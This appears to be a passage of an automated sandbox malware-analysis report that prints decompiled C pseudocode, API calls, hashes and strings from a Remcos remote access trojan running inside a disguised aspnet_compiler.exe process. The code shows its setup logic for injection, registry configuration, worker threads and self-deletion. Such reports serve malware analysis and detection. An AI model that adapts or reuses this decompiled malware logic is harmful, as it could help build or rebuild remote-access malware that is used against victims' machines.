                    • Opcode Fuzzy Hash: 87b52fe04148b378890c993190cc93a161ae8e284d280082790b9f2e946aa0e2
                    • Instruction Fuzzy Hash: 98E0923130C310BBFF310F25BE08F173A94EB89B75F21063AF211E40E4D6918801961C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E0041A168(void* __ecx, void* __edx, void* __edi, void* __eflags) {
                    				char _v8;
                    				long _v12;
                    				char _v36;
                    				char _v60;
                    				char _v92;
                    				short _v604;
                    				void* __ebp;
                    				void* _t26;
                    				void* _t35;
                    				void* _t39;
                    				void* _t40;
                    				void* _t41;
                    
                    				_t41 = __eflags;
                    				_t35 = __edx;
                    				_v8 = 0x10;
                    				_t39 = __ecx;
                    				 *0x472afc(1,  &_v92,  &_v8); // executed
                    				_v12 = 0x100;
                    				GetUserNameW( &_v604,  &_v12); // executed
                    				E00402FF4(_t26, _t39, E004042DC(_t26,  &_v36,  &_v92, _t40, _t41, E0040415E(_t26,  &_v60, _t35, _t40, "/")), __edi, _t40, _t41,  &_v604);
                    				E00401EE9();
                    				E00401EE9();
                    				return _t39;
                    			}
















                    APIs
                    • GetUserNameW.ADVAPI32(?,00000010), ref: 0041A19D
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 42a164d2d012b871ed5a935197de62b022d1b451b17e784ad711071e8924de7d
                    • Instruction ID: ca40992a929d7f440b27bf36de23ad6c7f00c11e63c364431abc424016e70018
                    • Opcode Fuzzy Hash: 42a164d2d012b871ed5a935197de62b022d1b451b17e784ad711071e8924de7d
                    • Instruction Fuzzy Hash: 1F01FF7290011DABCB04EBD5DC45ADEB7BCEF44319F10016AB505B61D1EEB86A89CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID:
                    • API String ID: 1507349165-0
                    • Opcode ID: 4a5bcecb3f40c54b5b167585e102f21ee889ffcc3164b5e38b4e4b437a608611
                    • Instruction ID: 746b65c02e61119df28bf9f7234443caa874ec4429a0c44ab9f61596d4479e10
                    • Opcode Fuzzy Hash: 4a5bcecb3f40c54b5b167585e102f21ee889ffcc3164b5e38b4e4b437a608611
                    • Instruction Fuzzy Hash: 96B092B9108202FFCA160B60DD0887A7EAAABC8381F008A2CF186411B1C636C451AB26
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00433452() {
                    				_Unknown_base(*)()* _t1;
                    
                    				_t1 = SetUnhandledExceptionFilter(E0043345E); // executed
                    				return _t1;
                    			}





                    APIs
                    • SetUnhandledExceptionFilter.KERNELBASE(Function_0003345E,00433185), ref: 00433457
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: fb3aaaa52268b5920dbf3edef77856ac2629be7d88f1c4c86b65aace9ef12b18
                    • Instruction ID: 3c5ffc1f6ca5581617dc18551564c5a1f11bccfc48c0ed950457c3a26c38d402
                    • Opcode Fuzzy Hash: fb3aaaa52268b5920dbf3edef77856ac2629be7d88f1c4c86b65aace9ef12b18
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 91%
                    			E0040DEC9(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12) {
                    				char _v524;
                    				char _v700;
                    				char _v720;
                    				char _v724;
                    				char _v728;
                    				char _v752;
                    				char _v756;
                    				char _v760;
                    				char _v772;
                    				struct _SECURITY_ATTRIBUTES* _v776;
                    				char _v780;
                    				char _v784;
                    				intOrPtr _v796;
                    				intOrPtr _v812;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t76;
                    				void* _t79;
                    				char* _t94;
                    				void* _t95;
                    				struct _SECURITY_ATTRIBUTES* _t97;
                    				struct _SECURITY_ATTRIBUTES* _t98;
                    				struct _SECURITY_ATTRIBUTES* _t100;
                    				void* _t116;
                    				void* _t117;
                    				void* _t124;
                    				char _t130;
                    				struct _SECURITY_ATTRIBUTES** _t135;
                    				signed char* _t140;
                    				void* _t143;
                    				void* _t145;
                    				void* _t158;
                    				struct _SECURITY_ATTRIBUTES* _t161;
                    				intOrPtr _t163;
                    				struct _SECURITY_ATTRIBUTES* _t164;
                    				struct _SECURITY_ATTRIBUTES* _t171;
                    				WCHAR* _t179;
                    				struct _SECURITY_ATTRIBUTES* _t180;
                    				intOrPtr _t194;
                    				intOrPtr* _t197;
                    				void* _t199;
                    				void* _t204;
                    				char* _t207;
                    				void* _t209;
                    				void* _t217;
                    				void* _t223;
                    				void* _t224;
                    				signed int _t225;
                    				char* _t232;
                    				void* _t234;
                    				intOrPtr* _t243;
                    				void* _t245;
                    				intOrPtr* _t253;
                    				void* _t255;
                    				struct _SECURITY_ATTRIBUTES* _t273;
                    				void* _t286;
                    				struct _SECURITY_ATTRIBUTES* _t287;
                    				struct _SECURITY_ATTRIBUTES* _t297;
                    				intOrPtr* _t305;
                    				void* _t324;
                    				char* _t382;
                    				signed int _t414;
                    				signed int _t418;
                    				char _t420;
                    				void* _t423;
                    				void* _t479;
                    				void* _t496;
                    				struct _SECURITY_ATTRIBUTES* _t497;
                    				intOrPtr _t498;
                    				char* _t503;
                    				intOrPtr* _t505;
                    				void* _t508;
                    				void* _t509;
                    				struct _SECURITY_ATTRIBUTES* _t510;
                    				void* _t511;
                    				void* _t514;
                    				signed int _t517;
                    				signed int _t519;
                    				void* _t522;
                    				void* _t523;
                    				void* _t524;
                    				void* _t526;
                    				void* _t527;
                    				void* _t528;
                    				void* _t529;
                    				void* _t530;
                    				void* _t531;
                    				void* _t535;
                    				void* _t537;
                    
                    				_t537 = __eflags;
                    				_t479 = __edx;
                    				_t517 = _t519;
                    				 *0x470d40 = _a4;
                    				_push(_t286);
                    				E0041B4C9();
                    				_t497 = 0;
                    				GetModuleFileNameW(0, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", 0x104);
                    				E0040E8E0( &_v724, _t479, _t537);
                    				_t522 = (_t519 & 0xfffffff8) - 0x2f4;
                    				E004020D6(_t286, _t522, _t479, _t537, 0x4732bc);
                    				_t523 = _t522 - 0x18;
                    				E004020D6(_t286, _t523, _t479, _t537,  &_v728);
                    				_t76 = E0041A976( &_v756, _t479); // executed
                    				_t524 = _t523 + 0x30;
                    				E0040F05A(_t479, _t76);
                    				E00401E6D( &_v760, _t479);
                    				_t79 = E0043E5D0(_a12, "-l");
                    				_t305 = _t496;
                    				if(_t79 != 0) {
                    					_t287 = 3;
                    					_t501 = 0x473298;
                    					__eflags =  *((char*)(E00401F8B(E00401E45(0x473298, _t479, _t517, __eflags, _t287))));
                    					 *0x470b32 = __eflags != 0;
                    					_t481 = E004052FE( &_v780, "Software\\", _t517, E00401E45(0x473298, _t479, _t517, __eflags, 0xe));
                    					E00401FC2(0x473238, _t83, 0x473298, E00408832(_t287,  &_v756, _t83, 0, _t517, __eflags, "\\"));
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FA0(0x473268, E00401E45(0x473298, _t83, _t517, __eflags, 0xe));
                    					L00405A86(_t287, 0x4732d4, _t83, "Exe");
                    					E00401E45(0x473298, _t83, _t517, __eflags, 0x32);
                    					__eflags =  *((char*)(E004051C3(0)));
                    					 *0x470d4b = __eflags != 0;
                    					E00401E45(0x473298, _t83, _t517, __eflags, 0x33);
                    					_t94 = E004051C3(0);
                    					__eflags =  *_t94;
                    					 *0x470d60 =  *_t94 != 0;
                    					__eflags =  *0x470d4b;
                    					if(__eflags == 0) {
                    						L5:
                    						_v776 = _t497;
                    						_t95 = E00401E45(_t501, _t481, _t517, __eflags, 0xd);
                    						_t482 = "0";
                    						_t324 = _t95;
                    						__eflags = E0040AF37(__eflags);
                    						if(__eflags != 0) {
                    							_t514 = OpenMutexA(0x100000, _t497, E00401F8B(E00401E45(_t501, "0", _t517, __eflags, 7)));
                    							__eflags = _t514;
                    							if(_t514 != 0) {
                    								WaitForSingleObject(_t514, 0xea60);
                    								CloseHandle(_t514);
                    							}
                    							_t482 = E00401F8B(0x473238);
                    							_t273 = E00412831(_t272, "Inj",  &_v776);
                    							_pop(_t324);
                    							__eflags = _t273;
                    							if(_t273 != 0) {
                    								_t482 = E00401F8B(0x473238);
                    								E00412C91(_t274, __eflags, "Inj");
                    								_pop(_t324);
                    							}
                    							_t501 = 0x473298;
                    						}
                    						_t97 = E0040C577();
                    						__eflags = _t97;
                    						if(_t97 != 0) {
                    							_t98 =  *0x472adc;
                    							__eflags = _t98;
                    							if(__eflags != 0) {
                    								_t98->nLength(); // executed
                    							}
                    							E00419E1E(_t324, __eflags); // executed
                    							_t100 =  *0x472ae8;
                    							__eflags = _t100;
                    							if(_t100 != 0) {
                    								 *0x46f9d0 = _t100->nLength();
                    							}
                    							__eflags = _v776 - _t497;
                    							if(__eflags == 0) {
                    								__eflags = E00406D8A(_t324);
                    								if(__eflags != 0) {
                    									E00406DAC();
                    									E004068D4(_t501);
                    								}
                    								__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x2e))));
                    								if(__eflags != 0) {
                    									__eflags =  *0x472ae8 - _t497;
                    									if(__eflags != 0) {
                    										__eflags =  *0x46f9d0 - _t497; // 0x1
                    										if(__eflags == 0) {
                    											E004068D4(_t501);
                    										}
                    									}
                    								}
                    							}
                    							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x27))));
                    							if(__eflags != 0) {
                    								E00406DC9();
                    							}
                    							L004086CB(_t287, 0x473208, _t482, E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0xb)));
                    							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 4))));
                    							 *0x470b33 = __eflags != 0;
                    							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 5))));
                    							 *0x470b30 = __eflags != 0;
                    							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 8))));
                    							 *0x470b31 = __eflags != 0;
                    							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, _t287))));
                    							if(__eflags != 0) {
                    								__eflags = E0043A3D6(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x30)));
                    								if(__eflags != 0) {
                    									_t253 = E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 9));
                    									_t255 = E00401F8B(E00401E45(0x473298, _t482, _t517, __eflags, 0x30));
                    									_t482 =  *_t253;
                    									E00401EF3(0x473250,  *_t253, _t253, E0040CF38( &_v780,  *_t253, _t255));
                    									E00401EE9();
                    									_t501 = 0x473298;
                    								}
                    							}
                    							__eflags = _v776 - _t497;
                    							if(_v776 != _t497) {
                    								E00435760(_t497,  &_v524, _t497, 0x208);
                    								_t288 = 0x473280;
                    								_t116 = E0040245C();
                    								_t117 = E00401F8B(0x473280);
                    								_t483 = E00401F8B(0x473238);
                    								E004129E0(_t119, "exepath",  &_v524, 0x208, _t117, _t116);
                    								_t526 = _t524 + 0x20;
                    								L004086CB(0x473280, 0x473220, _t119,  &_v524);
                    								_t503 = 0x473298;
                    								goto L42;
                    							} else {
                    								__eflags =  *0x470b32;
                    								if(__eflags == 0) {
                    									L004086CB(_t287, 0x473220, _t482, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe");
                    								} else {
                    									E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x1e));
                    									_t297 =  *((intOrPtr*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0xc))));
                    									_t243 = E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 9));
                    									__eflags = _t297;
                    									_t501 = _t243;
                    									__eflags = _t297;
                    									_t245 = E00401F8B(E00401E45(0x473298, _t482, _t517, _t297, 0xa));
                    									E0040C307( *_t243, E00401F8B(E00401E45(0x473298, _t482, _t517, __eflags, 0x30)), __eflags, _t245, ((_t242 & 0xffffff00 | _t297 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t242 & 0xffffff00 | _t297 != 0x00000000) & 0x000000ff);
                    									_t524 = _t524 + 0xc;
                    								}
                    								_t217 = E0040245C();
                    								_t423 = 2;
                    								_t294 =  ~(__eflags > 0) | (_t217 + 0x00000001) * 0x00473220;
                    								_push( ~(__eflags > 0) | (_t217 + 0x00000001) * 0x00473220);
                    								_t510 = E004330A3(_t423, (_t217 + 1) * 0x473220 >> 0x20, _t501, __eflags);
                    								__eflags = _t510;
                    								if(_t510 == 0) {
                    									_t510 = _t497;
                    								} else {
                    									E00435760(_t497, _t510, _t497, _t294);
                    									_t524 = _t524 + 0xc;
                    								}
                    								E0043E0D9(_t510, E00401EE4(0x473220));
                    								_t288 = 0x473280;
                    								_t223 = E0040245C();
                    								_t224 = E00401F8B(0x473280);
                    								_t225 = E0040245C();
                    								E00412C2F(E00401F8B(0x473238), __eflags, "exepath", _t510, 2 + _t225 * 2, _t224, _t223); // executed
                    								E004330AC(_t510);
                    								_t526 = _t524 + 0x1c;
                    								_t503 = 0x473298;
                    								E00401E45(0x473298, _t227, _t517, __eflags, 0xd);
                    								_t483 = "0";
                    								__eflags = E0040AF37(__eflags);
                    								if(__eflags == 0) {
                    									L42:
                    									_push(1);
                    									_t124 = E00401F8B(E00401E45(_t503, _t483, _t517, __eflags, 0x34));
                    									_t527 = _t526 - 0x18;
                    									E00402073(_t288, _t527, _t483, _t517, _t124);
                    									_push("licence");
                    									_t484 = E00401F8B(0x473238); // executed
                    									E00412A57(0x473238, _t126); // executed
                    									_t528 = _t527 + 0x20;
                    									_t130 = E0043A3AC(_t128, E00401F8B(E00401E45(_t503, _t126, _t517, __eflags, 0x28)));
                    									 *0x470d48 = _t130;
                    									__eflags = _t130 - 2;
                    									if(_t130 != 2) {
                    										__eflags = _t130 - 1;
                    										if(_t130 != 1) {
                    											_t498 = CreateThread;
                    										} else {
                    											_t420 = 0;
                    											goto L44;
                    										}
                    									} else {
                    										_t420 = 1;
                    										L44:
                    										E0041B6A6(_t288, _t420, _t484, _t497);
                    										_t498 = __imp__CreateThread; // 0x747143e0
                    										CreateThread(_t497, _t497, E0041BD68, _t497, _t497, _t497);
                    									}
                    									_t529 = _t528 - 0x18;
                    									E00402073(_t288, _t529, _t484, _t517, "Remcos Agent initialized");
                    									_t530 = _t529 - 0x18;
                    									E00402073(_t288, _t530, _t484, _t517, "i");
                    									E0041A04A(_t288, _t498);
                    									_t531 = _t530 + 0x30;
                    									_t135 = E00401F8B(E00401E45(_t503, _t484, _t517, __eflags, 0x37));
                    									_v796 =  *((intOrPtr*)(E00401F8B(E00401E45(_t503, _t484, _t517, __eflags, 0x10))));
                    									_t140 = E00401F8B(E00401E45(_t503, _t484, _t517, __eflags, 0xf));
                    									__eflags =  *_t135;
                    									_t504 = _t140;
                    									_t143 = E0043A3AC(_t141, E00401F8B(E00401E45(0x473298, _t484, _t517,  *_t135, 0x36)));
                    									_t145 = E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x11));
                    									E0040949A(0x473298, _t498, __eflags,  *_t140 & 0x000000ff, _v812, E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x31)), _t145, _t143, (_t139 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
                    									__eflags =  *((char*)(E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x14)))) - 1;
                    									if(__eflags != 0) {
                    										_t287 = 0;
                    										__eflags = 0;
                    									} else {
                    										_t209 = 2;
                    										_t509 = E00432DF5(_t484, _t504, __eflags, _t209);
                    										_t287 = 0;
                    										 *_t509 = 0;
                    										_t418 = E00401E45(0x473298, _t484, _t517, __eflags, 0x35);
                    										__eflags =  *(E00401F8B(_t418));
                    										 *((char*)(_t509 + 1)) = _t418 & 0xffffff00 | __eflags != 0x00000000;
                    										CreateThread(0, 0, E00418B0F, _t509, 0, 0);
                    									}
                    									_t501 = 0x473298;
                    									__eflags =  *((char*)(E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x16)))) - 1;
                    									if(__eflags == 0) {
                    										_t204 = 2;
                    										_t508 = E00432DF5(_t484, 0x473298, __eflags, _t204);
                    										 *_t508 = 1;
                    										_t414 = E00401E45(0x473298, _t484, _t517, __eflags, 0x35);
                    										_t207 = E00401F8B(_t414);
                    										__eflags =  *_t207;
                    										_t49 =  *_t207 != 0;
                    										__eflags = _t49;
                    										 *((char*)(_t508 + 1)) = _t414 & 0xffffff00 | _t49;
                    										CreateThread(_t287, _t287, E00418B0F, _t508, _t287, _t287);
                    										_t501 = 0x473298;
                    									}
                    									__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x23)))) - 1;
                    									if(__eflags == 0) {
                    										 *0x470a85 = 1;
                    										_t197 = E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x25));
                    										_t199 = E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x26));
                    										_t484 =  *_t197;
                    										E00401EF3(0x472d40,  *_t197, _t197, E0040CEEC( &_v780,  *_t197, _t199));
                    										E00401EE9();
                    										CreateThread(_t287, _t287, E00401BC9, _t287, _t287, _t287);
                    										_t501 = 0x473298;
                    									}
                    									__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x2b)))) - 1;
                    									if(__eflags == 0) {
                    										_t501 = E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x2c));
                    										_t194 = E0043A3AC(_t192, E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x2d)));
                    										__eflags =  *_t501;
                    										_t484 = _t194;
                    										__eflags =  *_t501 != 0;
                    										E0040B6DC(_t194);
                    									}
                    									_t158 = E0041A168( &_v772, _t484, _t498, __eflags); // executed
                    									E00401EF3(0x4732a4, _t484, _t501, _t158);
                    									E00401EE9();
                    									_t161 =  *0x472ae0;
                    									__eflags = _t161;
                    									if(_t161 != 0) {
                    										_t161->nLength(_t287); // executed
                    									}
                    									CreateThread(_t287, _t287, E0040ECEA, _t287, _t287, _t287); // executed
                    									__eflags =  *0x470d4b;
                    									if( *0x470d4b != 0) {
                    										CreateThread(_t287, _t287, E0041163A, _t287, _t287, _t287);
                    									}
                    									__eflags =  *0x470d60;
                    									if( *0x470d60 != 0) {
                    										CreateThread(_t287, _t287, E00411C1E, _t287, _t287, _t287);
                    									}
                    									_t163 =  *0x46f9d0; // 0x1
                    									_t164 = _t163 - _t287;
                    									__eflags = _t164;
                    									if(__eflags == 0) {
                    										_push("User");
                    										goto L67;
                    									} else {
                    										__eflags = _t164 - 1;
                    										if(__eflags == 0) {
                    											_push("Administrator");
                    											L67:
                    											E004052DD(_t287, _t531 - 0x18, "Access Level: ", _t517, __eflags, E00402073(_t287,  &_v776, _t484, _t517));
                    											E00402073(_t287, _t531 - 4, "Access Level: ", _t517, "i");
                    											E0041A04A(_t287, _t498);
                    											E00401FB8();
                    										}
                    									}
                    									_t497 = 0x473238;
                    									_t171 = E004127E7(0x473238, E00401F8B(0x473238), "del"); // executed
                    									_pop(_t382);
                    									__eflags = _t171;
                    									if(__eflags != 0) {
                    										E00412903( &_v752, 0x80000001, E00401EE4(E0041A7B9( &_v776, 0x473238)), L"del");
                    										E00401EE9();
                    										_t179 = E00401EE4( &_v752);
                    										_t501 = DeleteFileW;
                    										while(1) {
                    											_t180 = DeleteFileW(_t179);
                    											__eflags = _t180;
                    											if(_t180 != 0) {
                    												break;
                    											}
                    											__eflags = _t287 - 0xa;
                    											if(_t287 < 0xa) {
                    												_t287 =  &(_t287->nLength);
                    												__eflags = _t287;
                    												Sleep(0xa);
                    												_t179 = E00401EE4( &_v752);
                    												continue;
                    											}
                    											goto L75;
                    										}
                    										goto L75;
                    									}
                    									goto L76;
                    								} else {
                    									_t232 = E00401E45(0x473298, "0", _t517, __eflags, 0xd);
                    									_t535 = _t526 - 0x18;
                    									_t483 = _t232;
                    									E0041A7B9(_t535, _t232);
                    									_t234 = E0040E991(__eflags);
                    									_t526 = _t535 + 0x18;
                    									__eflags = _t234 - 1;
                    									if(__eflags != 0) {
                    										goto L42;
                    									} else {
                    										_push(3);
                    										goto L39;
                    									}
                    								}
                    							}
                    						} else {
                    							_push(2);
                    							L39:
                    							_pop(_t511);
                    							goto L40;
                    						}
                    					} else {
                    						E00401FC2(0x473370, 0x473268, 0x473298, E00406292( &_v772, 0x473268, _t517, "-W"));
                    						E00401FB8();
                    						_v784 = 0;
                    						_t481 = E00401F8B(0x473238);
                    						__eflags = E00412831(_t282, "WD",  &_v784);
                    						if(__eflags != 0) {
                    							E00412C91(E00401F8B(0x473238), __eflags, "WD");
                    							E004119B8();
                    							L75:
                    							E00412D0B(0x80000001, E00401EE4(E0041A7B9( &_v776, _t497)), L"del");
                    							E00401EE9();
                    							_t382 =  &_v752;
                    							E00401EE9(); // executed
                    							L76:
                    							E0040D246(__eflags); // executed
                    							E00414271(); // executed
                    							asm("int3");
                    							_push(_t501);
                    							_t505 = _t382 + 0x68;
                    							E0040F0C7(_t287, _t505, _t505);
                    							_t305 = _t505;
                    							 *_t305 = 0x465554;
                    							 *_t305 = 0x465510;
                    							return E00434069(_t305);
                    						} else {
                    							goto L5;
                    						}
                    					}
                    				} else {
                    					_push(__ecx);
                    					_push(__ecx);
                    					__ecx =  &_v700;
                    					__eax = E0040F0F6( &_v700, __edx, __eflags, "license_code.txt", 2);
                    					__ecx = 0x473298;
                    					__ecx = E00401E45(0x473298, __edx, __ebp, __eflags, 0x34);
                    					__edx = __eax;
                    					__ecx =  &_v720;
                    					__eax = E0041047A( &_v720, __edx, __eflags);
                    					__ecx =  &_v720;
                    					__eax = E0040F0A7( &_v720, __edx, __eflags);
                    					__ecx =  &_v720;
                    					L77();
                    					0 = 1;
                    					L40:
                    					E00401FB8();
                    					return _t511;
                    				}
                    			}

                    APIs
                      • Part of subcall function 0041B4C9: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4DE
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B4E7
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4FE
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B501
                      • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B513
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B516
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B52C
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B52F
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040DEE5), ref: 0041B540
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B543
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040DEE5), ref: 0041B558
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B55B
                      • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040DEE5), ref: 0041B56C
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B56F
                      • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040DEE5), ref: 0041B57B
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B57E
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040DEE5), ref: 0041B590
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B593
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040DEE5), ref: 0041B5A0
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5A3
                      • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040DEE5), ref: 0041B5B4
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5B7
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040DEE5), ref: 0041B5C4
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5C7
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040DEE5), ref: 0041B5D9
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5DC
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040DEE5), ref: 0041B5E9
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5EC
                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000104), ref: 0040DEF2
                    • OpenMutexA.KERNEL32 ref: 0040E0E6
                      • Part of subcall function 0041047A: __EH_prolog.LIBCMT ref: 0041047F
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Similarity
                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologMutexNameOpen
                    • String ID: 2G$ 2G$ 2G$ 2G$ 2G$82G$82G$82G$82G$82G$82G$82G$82G$@-G$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$Exe$Inj$P2G$Remcos Agent initialized$Software\$User$del$del$exepath$h2G$h2G$licence$license_code.txt$p3G$Cqt
                    • API String ID: 1897280938-2901791990
                    • Opcode ID: 49a7957580137d1cb05b4e46d324b6582d4b73a72f3b266621ac4389117076e3
                    • Instruction ID: 9e1fa40da8247c9b585ea9a59a3a54fb039144435d37588c5c456d259acc364f
                    • Opcode Fuzzy Hash: 49a7957580137d1cb05b4e46d324b6582d4b73a72f3b266621ac4389117076e3
                    • Instruction Fuzzy Hash: 3532E670B0434167DA14BB729C57B6E26998F81708F04487FB946BB2E3EE7C8D45839E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    [Control-flow graph of function 00414271 omitted; legend: Executed / Not Executed]
                    C-Code - Quality: 89%
                    			E00414271() {
                    				char _v16;
                    				char _v40;
                    				char _v64;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v136;
                    				void* _v159;
                    				char _v160;
                    				char _v184;
                    				char _v208;
                    				char _v232;
                    				char _v256;
                    				char _v280;
                    				char _v304;
                    				char _v328;
                    				char _v352;
                    				char _v376;
                    				char _v400;
                    				char _v424;
                    				char _v448;
                    				char _v472;
                    				char _v496;
                    				char _v520;
                    				char _v544;
                    				char _v568;
                    				char _v592;
                    				char _v616;
                    				char _v640;
                    				char _v664;
                    				char _v688;
                    				char _v712;
                    				char _v736;
                    				char _v760;
                    				char _v784;
                    				char _v808;
                    				char _v832;
                    				char _v856;
                    				char _v880;
                    				char _v904;
                    				char _v928;
                    				char _v952;
                    				char _v976;
                    				char _v1000;
                    				char _v1024;
                    				char _v1048;
                    				char _v1072;
                    				char _v1096;
                    				char _v1120;
                    				char _v1144;
                    				char _v1168;
                    				char _v1192;
                    				char _v1216;
                    				char _v1240;
                    				char _v1264;
                    				char _v1288;
                    				char _v1312;
                    				char _v1336;
                    				char _v1360;
                    				char _v1384;
                    				char _v1408;
                    				char _v1432;
                    				char _v1456;
                    				char _v1480;
                    				char _v1504;
                    				char _v1528;
                    				char _v1552;
                    				char _v1576;
                    				char _v2580;
                    				signed int _t177;
                    				void* _t179;
                    				long _t184;
                    				void* _t186;
                    				void* _t189;
                    				void* _t197;
                    				char* _t208;
                    				void* _t210;
                    				void* _t211;
                    				struct _SECURITY_ATTRIBUTES* _t212;
                    				struct _SECURITY_ATTRIBUTES* _t214;
                    				void* _t216;
                    				long _t221;
                    				void* _t222;
                    				void* _t223;
                    				void* _t237;
                    				void* _t245;
                    				void* _t246;
                    				struct _SECURITY_ATTRIBUTES* _t249;
                    				intOrPtr* _t252;
